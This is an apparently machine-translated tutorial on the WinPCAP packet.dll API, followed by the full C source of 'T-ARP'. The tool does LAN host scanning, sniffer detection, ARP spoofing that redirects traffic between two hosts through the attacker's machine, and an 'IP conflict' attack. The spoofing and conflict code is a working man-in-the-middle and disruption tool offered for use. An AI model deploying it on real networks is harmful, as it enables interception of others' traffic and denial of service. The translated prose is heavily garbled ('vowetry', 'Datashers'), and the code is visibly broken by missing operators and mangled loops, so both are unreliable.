Talk to WinPCAP Drive Write ARP Multifunction Tool One WinPCAP Drive Introduction Two Packet.dll Related Data Structure and Function Trim T-ARP Function and Principle Introduction Four T-ARP Main Code Analysis Five T-ARP Source Code 1, WinPCAP Driver WinPCAP (Windows Packet Capture) is a free, public network access system under the Windows platform. (Editor Note: WinPCAP development package can be downloaded to the following two URLs: (1) http://winpcap.polito.it/, (2) VC Knowledge Base Toolbar) Developing WinPCap This project is available for Win32 applications Access the ability of the network underlayer. It provides the following functions: 1> Capture the original datagram, including the data reported on the shared network and exchange / acceptance between each other; 2> Before the data is reported to the application, according to the custom The rule filters some special datagrams; 3> Send raw datagram on the network; 4> Collect statistics during network communication. The main function of WinPCAP is to send and receive raw datagrams independently of host protocols such as TCP-IP. That is, WinPCAP cannot block, filter or control the sending of other application datagrams, which is just the data report transmitted on the shared network. Therefore, it cannot be used for QoS schedule or personal firewall. At present, the main object developed by WinPCAP is Windows NT / 2000 / XP, which is mainly because only a small portion of the user who uses WinPCap is only using Windows 95/98 / Me, and M $ has also given up the development of Win9x. . Therefore, the programs T-ARP related to this article are also NT / 2000 / XP users. In fact, the concept of 9X system in WinPCap is very similar to the NT system, just a bit difference in some implementation, such as 9X only supports ANSI encoding, and the NT system advises using Unicode encoding. This article discusses various functions provided by packet.dll because they can implement the requirements of this article. But if you have other special or more advanced requirements, WinPCAP also provides another dynamic connection wpcap.dll. Although WPCap.dll relies on packet.dll, it provides a simpler, direct and powerful way to better utilize programming environments. For example, a datagram is captured, creating a datagram filtering device or a data report that will be listened to a file, etc., WPCAP.DLL will provide you with more secure implementation methods. Second, Packet.dll Related Data Structure and Function One One of the Purpose of this article is how to use the WinPCAP driver to write ARP tools, so it is necessary to introduce some related data structures and functions, otherwise look at a row code and function, maybe some I don't know what the cloud is. First introduce some related data structures: 1. TypeDef struct _adapter adapter // Describe a network adapter; 2. Typedef struct _packet packet // describe a set of network datagrams; 3. Typedef struct nettype nettype // Describe the network type Data structure; 4. Typedef struct NPF_IF_ADDEF STRUCT NPF_IF_ADDR NPF_IF_ADDR // Describes the IP address of a network adapter; 5. Struct BPF_HDR // Data report header; 6. Struct BPF_STAT // Currently captured the statistics of the datagram. Below, you will introduce the various functions used by T-ARP, they are defined in packet.dll: 1> LPPACKET PACKETALLOCATEPACKET (VOID) If the run is successful, return a _packet structure pointer, otherwise returns NULL.
The result of successfully returned will be transferred to the PacketReceivePacket () function to receive network datagrams from the driver. 2> Void PacketCloseadapter (LPADAPTER LPADAPTER) Closes the network adapter provided in the parameter to release the associated Adapter structure. 3> Void PacketFreePacket (LPPACKET LPPACKET) Release the _packet structure provided by the parameter. 4> Boolean PacketGetAdapternames (LPSTR PSTR, Pulong Buffersize) Returns a list of network adapters that can be obtained and described. 5> Boolean PacketGetNetInfoEx (LPTSTR AdapterNames, NPF_IP_ADDR * BUFF, PLONG NENTRIES) Returns a full address information of a network adapter. Wherein npf_ip_addr structure comprises: IPAddress, SubnetMask, BroadcastIPAddress: ip address SubnetMask: Subnet Mask Broadcast: broadcast address 6> BOOLEAN PacketGetNetType (LPADAPTER AdapterObject, NetType * type) Returns the type of MAC of a network adapter. LinkSpeed and LinkType are included in the NETTYPE structure. Wherein LinkType comprising the following situations: NdisMedium802_3: Ethernet (802.3) NdisMediumWan: WANNdisMedium802_5: Token Ring (802.5) NdisMediumFddi: FDDINdisMediumAtm: ATMNdisMediumArcnet878_2: ARCNET (878.2) 7> BOOLEAN PacketGetStats (LPADAPTER AdapterObject, struct bpf_stat * s) return on several Currently captured the statistics of the report. The BPF_STAT structure includes: BS_RECV, BS_DROP, PS_IFDROP, BS_CAPTBS_RECV: Start capturing the number of datagrams received from the network adapter, including the number of lost datagrams; BS_DROP: Lost data reported. Data report loss occurs when the drive buffer is already full. 8> Pchar packetgetversion () Returns the version information about the DLL. 9> Void packetinitpacket (LPPACKET LPPACKET, PVOID BUFFER, UINT Length) initializes a _packet structure. 10> LPADAPTER PACKETOPETADAPTER (LPTSTR AdapterName Opens a network adapter. 11> Boolean PacketReceivePacket (LPADAPTER AdapterObject, LPPACKET LPPACKET, BOOLEAN SYNC) Reads network datagrams and statistics from the NPF driver. Data News Code Structure: | BPF_HDR | DATA | Padding | BPF_HDR | DATA | PADDING | 12> Boolean PacketSendPacket (LPPADAPTEROBJECT, LPPACKET LPPACKET, BOOLEAN SYNC) Sends a copy of one or more datagrams. 13> Boolean PacketSetBuff (LPADAPTER AdapterObject, INT DIM Sets the kernel buffer size capturing datagram. 14> Boolean PacketSethwfilter (LPADAPTER AdapterObject, Ulong Filter) Sets the hardware filtering rule for the received datagram.
The following is some typical filtering rules: ndis_packet_type_promiscuous: Set to a mixed mode, receive all flowing datagram; NDIS_PACKET_TYPE_DIRECTED: Only the destination is the local host network adapter will be received; ndis_packet_type_broadcast: Only broadcast data report will be Receive; NDIS_PACKET_TYPE_MULTITIST: Only multicast data reports corresponding to the local host network adapter will be received; ndis_packet_type_all_multicast: All multicast data reports are received; ndis_packet_type_all_local: All local datagrams are received. 15> Boolean PacketSetNumWrites (LPADAPTER AdapterObject, INT NWRITES) Set the number of times the packetsendpacket () function sends a data report replica. 16> Boolean PacketSetReadTimeout (INT TIMEOUT) is set to receive a "rest" after receiving a datagram. The above is the functions called by T-ARP, which contains most of the functions in packet.dll. If you want to know more about WinPCap, please visit the relevant website, home address: http://winpcap.polito.it 3, T-ARP function and principle introduction Preparation: 1. Install WinPCAP driver, the latest version is WinPCAP_3 .0_alpha, stable version is WinPCAP_2.3; 2. Before using ARP spoofing, you must start IP routing function, modify (add) registry options: hkey_local_machine / system / currentControlSet / Services / TCPIP / parameters / iPenableRouter = 0x1 option: - M Host Scan, get the IP address and MAC address of the host host in the local area network; -A anti-sniffing scan, get the IP address and MAC address of the sniffing host in the local area network; -S ARP spoof, spoof The two hosts specified in the LAN have enabled them to send the received data to the local host; the network sniffer, if you choose the deceived host, you will be local host, then you will monitor all the data flowing through the local host. Report; IP conflict, if you choose to deceive the two hosts that are the same non-local host, then IP conflict attacks; -R reset the deceived host, so that the deceived hosts will return to normal working conditions. Principle and implementation process: no matter what option, the first thing is to get the MAC address and related network settings of the local host. We send an ARP Request (ARP request) datagram to the local host with a special IP address (112.12.112.112.112). When the local host receives, an ARP Reply (ARP response) datagram is sent to respond to request, so We can get the MAC address of the local host. As related to related network settings can be obtained by PacketGetNetInfoEx () and PacketGetType (). -m Send broadcast to all hosts within the specified IP network segment (IP and Mac) (FF: FF: FF: FF: FF: FF) ARP Request Datasheet, the surviving host will be sent to the name of the local host. ARP Reply Datashers, you can get a list of current survival hosts.
Because the ARP Request is restricted to the ARP Request on many gateways - the ARP Request Datasters sent by non-intranet IP will not receive the gateway, if you use the IP of other hosts in the intranet to send ARP Request Datasters, If the filled MAC address and the corresponding IP are not in charge, an IP conflict occurs. So it is best to send a request with your IP and MAC address. -A The ARP Request Datasheet of 31-bit Broadcast Address (FF: FF: FF: FF: FF: FE) is sent to all hosts within the specified IP network (FF: FF: FF: FF: FF: FF: FF: FF: FF: FF: FF: FF: FF: FE). The host that is sniffing will send the ARP Reply datagram so that the list of current surviving hosts can be obtained. Sniffing Win2000 systems will respond to 16-bit vowetry (FF: FF: 00: 00: 00: 00: "And Win95 / 98 / ME in the sniff will not only respond to 16-bit countercast address, And also responded to 8-bit vowetry (FF: 00: 00: 00: 00: 00), and the * NIX system has different reactions made by various broadcast addresses. Here we choose a 31-bit vowetry address because most systems will respond to it when sniffing. The various systems under normal conditions will not respond to the 31-bit counterfeit broadcast address. -s (ARP spoof spoof) requires emphasizing that in some local area networks (such as Ethernet), the transmission and reception of the datagram based on the hardware address is based on the hardware address. This is the basis of our realization. First get the MAC address of the specified two hosts (assuming as a and b), then send ARP Reply datagrans to A, where the source IP address is the IP address of B, but the source MAC address is the MAC address of the local host. Such host A will consider the MAC address of the host B to be the MAC address of the local host, so the host A sent to the host B sent to the local host. Similar to the host B, the ARP Reply datagon is sent to the host A, the MAC address of the host A is the MAC address of the local host. Such host a and host B will understand the MAC address of the destination host as the MAC address of the local host, so that the data reported between them is first reached the local host, and we have set the local host to set IP routing. The system will automatically forward the datagram to the true destination host. Together, you can monitor the various datagrams they communicated. -S (Network Sniff Sniff) If the specified two destination hosts are local hosts, then the network adapter is set to mixed mode so that various data flowing through the local host network adapter can be monitored. -S (IP Conflict Shock) If you choose to deceive the two hosts that are the same non-local host (if it is host C), then send ARP Reply datagram to host c, the source IP address in the message is The IP address of the host C, but the source MAC address is the MAC address of the local host, so host c will find that another host has the same IP as yours, this is the IP conflict attack. If it is a non-XP system, you will jump out of a prompt window for an IP conflict, and the XP system will have a similar warning. However, please note that in the System Event Viewer in Host C, leave the mac address of the local host with conflict, so you'd better not abuse this feature. -r In the case of realizing ARP spoof, the ARP Reply datagram is sent to host a and b, notifying host a (b) pay attention to host B (a) MAC address as host B (a) its own MAC address, which host A and B will update their ARP cache to realize normal data communication.
Fourth, T-ARP Main Code Analysis 1> Custom Function: INT getMine () // Sends ARP Request Datashers, requests the MAC address of the local host; Void getData (LPPACKET LP, INT OP) // Classification Processing Received Data report; DWORD WINAPI SNIFF (LPVOID NO) // Sets the network adapter to a mixed mode, receives all flown data reports; DWORD WINAPI SendmasR (LPVOID NO) // Sends ARP Request Datashers, requests the MAC address of the specified IP DWORD WINAPI SENDSR (LPVOID NO) // Sends ARP Reply to make ARP spoof, or update the host's ARP cache. 2> Main Code Analysis Printf ("/ NLIBARARY VERSION:% S", PacketGetVersion ()); // Output DLL version information; PacketGetAdAme, & AdapterNames (& AdapterLength) // Get a list of network adapters and descriptions of local hosts LPADAPTER = packetopenadapter (AdapterList [Open-1]); // Open the specified network adapter; PacketGetNetType (LPADADAPTER, & NTYPE) // Get the MAC type of the network adapter; PacketgetNetinfoEx (AdapterList [Open-1], & IPBuff, & NPFLEN) / / Get relevant information about the specified network adapter; rthread = CreateThread (NULL, 0, SNIFF, (LPVOID) & Opti, 0, & threadrid); // Create a new thread to listen to network datagrans; packetSethWFilter (lpadapter, ndis_packet_type_promiscuous) // will The network adapter is set to a mixed mode, so that the data report that flows through the local host can be listened to the local host; the size of the kernel cache of the PacketSetBuff (LPADADAPTER, 500 * 1024) // is 500 * 1024; PacketsetReadTimeout (LPADAPTER, 1) / / Set the time to receive a data report to wait for 1 millisecond; packetReceivePacket (LPADAPTER, LPPACKETR, TRUE) // receives all datagrams after setting to mix mode; sthread = CreateThread (null, 0, sendmasr, (lpvoid) & Opti, 0, & threadsid; sthread = Createthread (NULL, 0, Sendsr, (LPVOID) & Opti, 0, & Threadsid); // Creating a new thread Send a specific ARP datagate PacketSetNumWrites (lpadapter, 2) // Send one During the data report, repeatedly sends twice; PacketSendPacket (LPADAPTER, LPPACKETS, TRUE) // Send a custom datagram; WaitForsingleObject (sthread, infinite); // Wait for send AR The thread of the P datagram; PacketGetStats (LPADAPTER, & STAT) // Get statistics for the network adapter; five, T-ARP source code #include "packet32.h" #include "ntddndis.h"
#include
#include
#pragma comment (LIB, "WS2_32") # Pragma Comment (Lib, "Packet")
#define eth_ip 0x0800
#define eth_arp 0x0806
#define arp_request 0x0001
#define ARP_REPLY 0x0002
#define arp_hardware 0x0001
#define max_num_adapter 10
#pragma Pack (Push, 1)
Typedef struct ethdr
{
Unsigned char eh_dst [6];
Unsigned char eh_src [6];
UNSIGNED SHORT EH_TYPE;
} Ethdr, * pethdr;
Typedef struct arphdr
{
UNSIGNED SHORT ARP_HDR;
UNSIGNED SHORT ARP_PRO;
UNSIGNED CHAR ARP_HLN;
UNSIGNED CHAR ARP_PLN;
UNSIGNED SHORT ARP_OPT;
Unsigned char Arp_sha [6];
UNSIGNED long ARP_SPA;
Unsigned char Arp_tha [6];
UNSIGNED long ARP_TPA;
Arphdr, * PARPHDR;
Typedef struct iphdr
{
UNSIGNED Char H_lenver;
UNSIGNED Char TOS;
UNSIGNED SHORT TOTAL_LEN;
UNSIGNED short Ident;
UNSIGNED SHORT FRAG_AND_FLAGS;
UNSIGNED CHAR TTL;
UNSIGNED Char Proto;
UNSIGNED Short Checksum;
Unsigned int sourceip;
Unsigned int desip;
} Iphdr, * piphdr;
#pragma Pack (Push)
LPADAPTER LPADAPTER = 0;
LPPACKET LPPACKETR, LPPACKETS;
Ulong MyIP, FirstIP, Secondip;
Uchar mmac [6] = {0}, FMAC [6] = {0}, SMAC [6] = {0};
BOOL mm = false, fm = false, SM = false;
File * fp;
Char adapterlist [max_num_adapter] [1024];
Char msg [50];
INT NUM = 0;
Void start ()
{
Printf ("T-ARP --- ARP Tools, by TOO2Y (??), 11-9-2002 / N");
Printf ("Homepage: www.safechina.net/n");
Printf ("e-mail: Too2y@safechina.net/n");
Return;
}
Void usage ()
{
Printf ("/ NUSAGE: T-ARP [-M | -A | -s | -r] firstip secondip / n / n");
Printf ("Option: / N");
Printf ("-M Mac Get the Mac Address from Firstip to Secondip / N");
Printf ("-A Antisniff Get the Snifing Host from First Pro]); Printf (" -S Spoof 1> Spoof the Host Between Firstip and Secondip / N ");
Printf ("SNIFF 2> Sniff if firstip == secondip == Your OWN IP / N");
Printf ("Shock 3> Shock if Firstip == Secondip! = Your OWN IP / N");
Printf ("-R RESET RESET The Spoofed Host Work Normally / N / N");
Printf ("attention: / n");
Printf ("1> You Must Have Installed The Winpcap_2.3 or WinPCAP_3.0_ALPHA / N");
Printf ("2> HKEY_LOCAL_MACHINE // System // CurrentControlset // Services // Tcpip // Parameters // iPenableRunt == 0x1 / N / N");
Return;
}
Int getMine ()
{
Char Sendbuf [1024];
INT K;
Ethdr eth;
Arphdr ARP;
For (k = 0; k <6; k )
{
Eth.eh_dst [k] = 0xFF;
Eth.eh_src [k] = 0x82;
ARP.ARP_SHA [K] = 0x82;
ARP.ARP_THA [K] = 0x00;
}
Eth.e_type = HTONS (Eth_arp);
Arp.arp_hdr = htons (arp_hardware);
Arp.arp_pro = htons (eth_ip);
Arp.arp_hln = 6;
Arp.arp_pln = 4;
Arp.arp_opt = htons (arp_request);
Arp.arp_tpa = HTONL (MyIP);
Arp.arp_spa = inet_addr ("112.112.112.112");
MEMSET (Sendbuf, 0, SIZEOF (Sendbuf);
Memcpy (Sendbuf, ð, SIZEOF (ETH));
Memcpy (Sendbuf Sizeof (Eth), & ARP, SIZEOF (ARP));
PacketinitPacket (LPPACKETS, Sendbuf, Sizeof (Eth) SizeOf (ARP));
IF (PacketSendPacket (LPADAPTER, LPPACKETS, TRUE) == FALSE)
{
Printf ("PacketsendPacket In getmine error:% d / n", getLastError ());
Return -1;
}
Return 0;
}
Void getData (LPPACKET LP, INTOP)
{
Ulong UlbytesReceived, Off, Tlen, Ulen, Ullines;
Ulong J, K;
Ethdr * eth;
Arphdr * ARP;
PIPHDR IP;
Char * buf, * pchar, * pline, * base; struct bpf_hdr * HDR;
Struct SockAddr_in sin;
UlbytesReceived = lp-> ulbytesreceived;
BUF = (char *) lp-> buffer;
OFF = 0;
While (off { IF (kbhit ()) { Return; } HDR = (Struct BPF_HDR *) (BUF OFF); OFF = HDR-> BH_HDRLEN PCHAR = (char *) (BUF OFF); Base = pchar; OFF = packet_wordalign (OFF HDR-> BH_CAPLEN); Eth = (pethdr) pchar; ARP = (PARPHDR) (Pchar SizeOf (Ethdr)); IF (Eth-> EH_TYPE == HTONS (Eth_ip)) { IP = (pipHDR) (PCHAR SIZEOF (Ethdr)); IF (FM && SM && (OP == 3)) { IF (((ip-> sourceip! = htonl (myip)) && (ip-> destip! = HTONL (MyIP)) &&! Strcmp ((char *) Eth-> EH_DST, (CHAR *) MMAC))) && ((IP-> Sourceip == HTONL (FirstIP)) || (ip-> destip == HTONL (FirstIP)) || (ip-> sourceip == HTONL (Secondip)) || (ip-> destip == HTONL (Secondip))))))))) || ((FirstIP == Myip) && (Secondip == MyIP)))))) { MEMSET (MSG, 0, SIZEOF (MSG)); sin.sin_addr.s_addr = ip-> sourceIP; Printf ("[IP:]% 16S ---> [IP:]", INET_NTOA (SIN.SIN_ADDR)); STRCPY (MSG, INT_NTOA (SIN.SIN_ADDR); STRCAT (MSG 15, "->"); Sin.sin_addr.s_addr = ip-> destip; Printf ("% 16S / N", INET_NTOA (SIN.SIN_ADDR); STRCAT (MSG 23, INET_NTOA (SIN.SIN_ADDR); FSeek (FP, -2, 1); FWRITE ("/ R / N / R / N / R / N", 6, 1, FP); FWRITE (MSG, 38, 1, FP); FWRITE ("/ r / n", 2, 1, fp); Ullines = (HDR-> BH_CAPLEN 15) / 16; For (k = 0; k { PLINE = PCHAR; Printf ("% 08LX:", PCHAR-BASE); ulen = tlen; Ulen = (ULEN> 16)? 16: ulen; TLEN- = ulen; For (j = 0; j Printf ("% 02x", * (byte *) PCHAR ); if (ulen <16) Printf ("% * s", (16-ulen) * 3, "" " PCHAR = PLINE; For (j = 0; j { Printf ("% c", isprint (* pchar)? * pchar: '' '' '); FPUTC (isprint (* pchar) * pchar: ''. '', fp); } Printf ("/ n"); } Printf ("/ n"); FWRITE ("/ r / n", 2, 1, fp); } } CONTINUE; } ELSE IF ((Eth-> EH_TYPE == Htons (Eth_arp)) && (ARP-> ARP_OPT == HTONS (ARP_REPLY))) { Sin.sin_addr.s_addr = arp-> arp_spa; IF (sin.sin_addr.s_addr == HTONL (MyIP)) { Memcpy (mmac, eth-> eh_src, 6); IF (! mm) { Printf ("/ t"); For (k = 0; k <5; k ) Printf ("%. 2X -", Eth-> EH_SRC [K]); Printf ("%. 2x / n", Eth-> eh_src [5]); Switch (OP) { Case 1: Printf ("/ n [Mac List:]"); Break; Case 2: Printf ("/ n [sniff host:]"); Break; DEFAULT: Break; } } mm = true; } IF ((OP == 1) || (OP == 2)) { Printf ("/ n [ip:]% .16s / t [mac:]", INET_NTOA (SIN.SIN_ADDR)); For (k = 0; k <5; k ) Printf ("%. 2X -", Eth-> EH_SRC [K]); Printf ("%. 2X", Eth-> eh_src [5]); } ELSE IF (((op == 3) || (OP == 4)) && (! fm ||! sm)) { IF (ARP-> ARP_SPA == HTONL (FIRSTIP)) { Memcpy (FMAC, Eth-> EH_SRC, 6); FM = True; } IF (ARP-> ARP_SPA == HTONL (SECONDIP)) { Memcpy (SMAC, Eth-> EH_SRC, 6); SM = True; } } } } Return; } DWORD WINAPI SNIFF (LPVOID NO) { INT OPTION = * (int *) NO; Char recvbuf [1024 * 250]; IF (PacketSethWFilter (LPADAPTER, NDIS_PACKET_TYPE_PMISCUOS) == false) { Printf ("Warning: Unable to set the adapter to promiscuous mode / n"); IF (PacketSetBuff (LPadapter, 500 * 1024) == false) { Printf ("PacketSetBuff Error:% D / N", getLastError ()); Return -1; } IF (PacketSetReadTimeout (LPADAPTER, 1) == false { Printf ("Warning: Unable to set the timeout / n"); } IF ((LPPACKETR = packet ()) == false) { Printf ("PacketAllocatePacket Receive Error:% D / N", getLastError ()); Return -1; } PacketinitPacket (LPPACKETR, (CHAR *) Recvbuf, SizeOf (Recvbuf)); While (! kbhit ()) { IF (PacketReceivePacket (LPADAPTER, LPPACKETR, TRUE) == FALSE { Return -1; } GetData (LPPACKETR, OPTION); } Return 0; } DWORD WINAPI Sendmasr (LPVOID NO) { INT FUN = * (int *) NO; INT K, Stimes; Char Sendbuf [1024]; Ethdr eth; Arphdr ARP; IF (Fun <1 || Fun> 4) { Return -1; } Else { For (k = 0; k <6; k ) { Eth.eh_dst [k] = 0xFF; ARP.ARP_THA [K] = 0x00; } IF (fun == 2) Eth.eh_dst [5] = 0xfe; } Memcpy (Eth.EH_SRC, MMAC, 6); Eth.e_type = HTONS (Eth_arp); Arp.arp_hdr = htons (arp_hardware); Arp.arp_pro = htons (eth_ip); Arp.arp_hln = 6; Arp.arp_pln = 4; Arp.arp_opt = htons (arp_request); Arp.arp_spa = HTONL (MyIP); Memcpy (arp.arp_sha, mmac, 6); IF (Fun == 1 || Fun == 2) STIMES = 1; Else IF (Fun == 3 || Fun == 4) STIMES = 2; FOR (k = 0; k { IF (stimes == 1) { Arp.arp_tpa = HTONL (FirstIP (Num )); } Else IF (stimes == 2) { Switch (k) { Case 0: Arp.arp_tpa = HTONL (FIRSTIP); Break; Case 1: Arp.arp_tpa = HTONL (Secondip); Break; DEFAULT: Break; } } MEMSET (Sendbuf, 0, SIZEOF (Sendbuf); Memcpy (sendbuf, ð, sizeof (eth)); Memcpy (Sendbuf SizeOf (Eth), & Arp, SizeOf (ARP)); PacketinitPacket (LPPACKETS, Sendbuf, Sizeof (Eth) SizeOf (ARP)); IF (PacketSendPacket (LPADAPTER, LPPACKETS, TRUE) == FALSE) { Printf ("PacketSendPacket in Sendmasr Error:% D / N", getLastError ()); Return -1; } } Return 0; } DWORD WINAPI Sendsr (LPVOID NO) { INT FUN = * (int *) NO; INT J, K; Char Sendbuf [1024]; Struct SockAddr_in fsin, ssin Bool stimes = false; Ethdr eth; Arphdr ARP; fsin.sin_addr.s_addr = HTONL (FirstIP); SSIN.SIN_ADDR.S_ADDR = HTONL (Secondip); Eth.e_type = HTONS (Eth_arp); Arp.arp_hdr = htons (arp_hardware); Arp.arp_pro = htons (eth_ip); Arp.arp_hln = 6; Arp.arp_pln = 4; Arp.arp_opt = htons (arp_reply); IF (fun == 3) { IF (mm) { IF ((firstip == myip) && (secondip == myip)) { FM = True; SM = True; Memcpy (FMAC, MMAC, 6); Memcpy (SMAC, MMAC, 6); } Else if (! fm ||! SM) { Printf ("/ NNOT Get Enough Data / N); Return -1; } For (j = 0; j <2; j ) { IF (j == 0) { Printf ("/ nspoofing% .16s:", inet_ntoa (fsin.sin_addr); Printf ("%. 16S ==>", INET_NTOA (SSIN.SIN_ADDR)); } Else IF (j == 1) { Printf ("Spoofing% .16S:", INET_NTOA (SSIN.SIN_ADDR); Printf ("%. 16S ==>", INET_NTOA (fsin.sin_addr); } For (k = 0; k <5; k ) Printf ("%. 2X -", MMAC [K]); Printf ("%. 2x / n", mmac [5]); } Printf ("/ Ni Will Try to Snoof ... / N / N"); STIMES = TRUE; } Else { Printf ("/ NNOT Get Enough Data / N); Return -1; } } Else IF (Fun == 4) { IF (mm) { IF ((firstip == myip) && (secondip == myip)) { FM = true; SM = true; Memcpy (FMAC, MMAC, 6); Memcpy (SMAC, MMAC, 6); } Else if (! fm ||! SM) { Printf ("/ NNOT Get Enough Data / N); Return -1; } Printf ("/ nreset% .16s:", inet_ntoa (fsin.sin_addr)); Printf ("%. 16S ==>", INET_NTOA (SSIN.SIN_ADDR)); For (k = 0; k <5; k ) Printf ("%. 2X -", SMAC [k]); Printf ("%. 2x / n", SMAC [5]); Printf ("RESET% .16S:", INET_NTOA (SSIN.SIN_ADDR); Printf ("%. 16S ==>", INET_NTOA (fsin.sin_addr); For (k = 0; k <5; k ) Printf ("%. 2X -", FMAC [k]); Printf ("%. 2x / n / n", FMAC [5]); STIMES = FALSE; } Else { Printf ("/ NNOT Get Enough Data / N); Return -1; } } Else Return -1; DO { Memcpy (Eth.eH_DST, FMAC, 6); Memcpy (ARP.ARP_THA, FMAC, 6); Arp.arp_tpa = HTONL (FIRSTIP); Arp.arp_spa = HTONL (Secondip); IF (! stimes) { Memcpy (Eth.EH_SRC, SMAC, 6); Memcpy (ARP.ARP_SHA, SMAC, 6); } Else { Memcpy (Eth.EH_SRC, MMAC, 6); Memcpy (arp.arp_sha, mmac, 6); } MEMSET (Sendbuf, 0, SIZEOF (Sendbuf); Memcpy (Sendbuf, ð, SIZEOF (ETH)); Memcpy (Sendbuf Sizeof (Eth), & ARP, SIZEOF (ARP)); PacketinitPacket (LPPACKETS, Sendbuf, Sizeof (Eth) SizeOf (ARP)); IF (PacketsetNumWrites (LPADAPTER, 2) == FALSE) { Printf ("Warning: Unable to send a packet 2 Times / N"); } IF (PacketSendPacket (LPADAPTER, LPPACKETS, TRUE) == FALSE) { Printf ("PacketSendPacket In Sendsr Error:% D / N", getLastError ()); Return -1; } Sleep (1000); Memcpy (Eth.eH_DST, SMAC, 6); Memcpy (arp.arp_tha, smac, 6); Arp.arp_tpa = HTONL (Secondip); Arp.arp_spa = HTONL (FIRSTIP); IF (! stimes) { Memcpy (Eth.EH_SRC, FMAC, 6); Memcpy (arp.arp_sha, fmac, 6); } Else { Memcpy (Eth.EH_SRC, MMAC, 6); Memcpy (arp.arp_sha, mmac, 6); } MEMSET (Sendbuf, 0, SIZEOF (Sendbuf); Memcpy (Sendbuf, ð, SIZEOF (ETH)); Memcpy (Sendbuf Sizeof (Eth), & ARP, SIZEOF (ARP)); PacketinitPacket (LPPACKETS, Sendbuf, Sizeof (Eth) SizeOf (ARP)); IF (PacketSendPacket (LPADAPTER, LPPACKETS, TRUE) == FALSE) { Printf ("PacketSendPacket Int Sendsr Error:% D / N", getLastError ()); Return -1; } Sleep (1000); WHILE (STIMES); IF (fun == 4) Printf ("RESET SUCCESSFULLY); Return 0; } Int main (int Argc, char * argv []) { Handle sthread, rthread; Wchar adaptername [8192]; Wchar * name1, * name2; Ulong adapterLength; DWORD thREADSID, Threadrid; Struct Nettype NTYPE; Struct BPF_STAT Stat; Struct SockAddr_in sin; Struct NPF_IF_ADDR IPBUFF; Int adapternum = 0, Opti = 0, Open, I, Total Long npflen; System ("cls.exe"); START (); IF (argc! = 4) { USAGE (); GetChe (); Return -1; } Else { IF (! STRCMP (Argv [1], "- M"))) { Opti = 1; } Else if (! Strcmp (Argv [1], "- A"))) { Opti = 2; } Else if (! Strcmp (Argv [1], "- S"))) { Opti = 3; IF ((fp = fopen ("capture.txt", "w ")) == NULL) { Printf ("Open Capture.txt Error:% D / N"); Return -1; } Else { FWRITE ("T-ARP CAPTRUE DATA", 20, 1, FP); } } Else if (! Strcmp (Argv [1], "- R")) { Opti = 4; } Else { USAGE (); GetChe (); Return -1; } } FigStip = NTOHL (INET_ADDR (Argv [2])); Secondip = NTOHL (INET_ADDR (Argv [3])); Total = secondip-firstip 1; Printf ("/ NLIBARARY VERSION:% S", packetgetversion ()); AdapterLength = SizeOf (Adaptername); IF (PacketGetAdapternames ((char *) adaptername, & adapterLength) == false) { Printf ("PacketGetAdapternames Error:% D / N", getLastError ()); Return -1; } Name1 = adaptername; Name2 = adaptername; i = 0; While (* Name1! = '' / 0 ') || (* (Name1-1)! =' '/ 0'))) { IF (* Name1 == '' / 0 ') { Memcpy (AdapterList [i], Name2, 2 * (Name1-Name2)); Name2 = Name1 1; i ; } Name1 ; } Adapternum = i; Printf ("/ NADADAPTERS Installed: / N"); For (i = 0; i WPRINTF (L "% D-% S / N", i 1, AdapterList [i]); DO { Printf ("/ NSELECT The NUMBER of the Adapter to Open:"); Scanf ("% D", & open); IF (open> = 1 && open <= adapternum) Break; } While (Open <1 || open> adapternum); LPADAPTER = PacketopenAdapter (AdapterList [Open-1]); IF (! lpadapter || (lpadapter-> hfile == invalid_handle_value))) { Printf ("Packetopenadapter Error:% D / N", getLastError ()); Return -1; } IF (PacketGetType (LPADAPTER, & NTYPE)) { Printf ("/ n / t / t *** host information *** / n"); Printf ("[linktpye:] / T% D / T / T", NTYPE.LINKTYPE; Printf ("[LinkSpeed:] / T% D B / S / N", NTYPE.LINKSPEED; } NPFLEN = SizeOf (IPBUF); IF (PacketGetNetinfoEx (AdapterList [Open-1], & IPBuff, & npflen) { SIN = * (Struct SockAddr_IN *) & (ipbuff.broadcast); Printf ("[Broadcast:] / T% .16S / T", INET_NTOA (SIN.SIN_ADDR); SIN = * (struct socmeddr_in *) & (ipbuff.subnetmask); Printf ("[SubnetMask:] / T% .16S / N", INET_NTOA (SIN.SIN_ADDR)); SIN = * (Struct SockAddr_in *) & (ipbuff.ipaddress); Printf ("[ipaddress:] / t% .16s / t", inet_ntoa (sin.sin_addr); Myip = ntohl (sin.sin_addr.s_addr); Printf ("[MacAddress:]"); } Else { PRINTF ("/ Nnot Get Enough Data / N); PacketFreePacket; PacketCloseadapter (LPADAPTER); Return -1; } IF ((LPPACKETS = packet ()) == false) { Printf ("PacketAllocatePacket Send Error:% D / N", getLastError ()); Return -1; } Rthread = CreateThread (NULL, 0, SNIFF, (LPVOID) & Opti, 0, & Threadrid; SLEEP (300); IF (getMine ()) { PacketFreePacket (LPPACKETS); PacketFreePacket (LPPACKETR); PacketCloseadapter (LPADAPTER); Return -1; } SLEEP (300); IF ((Opti == 1) || (OPTI == 2))) { For (i = 0; i { Sthread = CreateThread (Null, 0, Sendmasr, (LPVOID) & Opti, 0, & Threadsid; Sleep (30); } Sleep (1000); } ELSE IF ((Opti == 3) || (Opti == 4))) { Sthread = CreateThread (Null, 0, Sendmasr, (LPVOID) & Opti, 0, & Threadsid; SLEEP (300); CloseHandle (sthread); Sthread = CreateThread (Null, 0, Sendsr, (LPVOID) & Opti, 0, & Threadsid; } WaitforsingleObject (sthread, infinite); CloseHandle (sthread); CloseHandle (Rthread); IF (PacketGetStats (LPadapter, & Stat) == False) { Printf ("Warning: Unable to Get The Adapter Stat / N"); } Else { Printf ("/ N / N% D P Packets Received,% D Packets Lost! / N", Stat.Bs_Recv, Stat.BS_DROP); } PacketFreePacket (LPPACKETS); PacketFreePacket (LPPACKETR); PacketCloseadapter (LPADAPTER); Return 0; } (Full text)
